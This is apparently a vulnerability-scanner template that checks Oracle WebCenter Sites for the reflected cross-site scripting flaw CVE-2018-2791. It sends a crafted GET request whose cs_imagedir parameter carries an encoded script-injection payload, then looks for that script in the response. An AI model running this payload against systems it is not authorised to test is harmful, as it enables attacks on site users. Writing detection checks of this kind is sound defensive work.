id: CVE-2018-2791

info:
  name: Oracle WebCenter Sites XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
    matchers:
      - type: word
        words:
          - "<script>alert(1337)</script>"
        part: body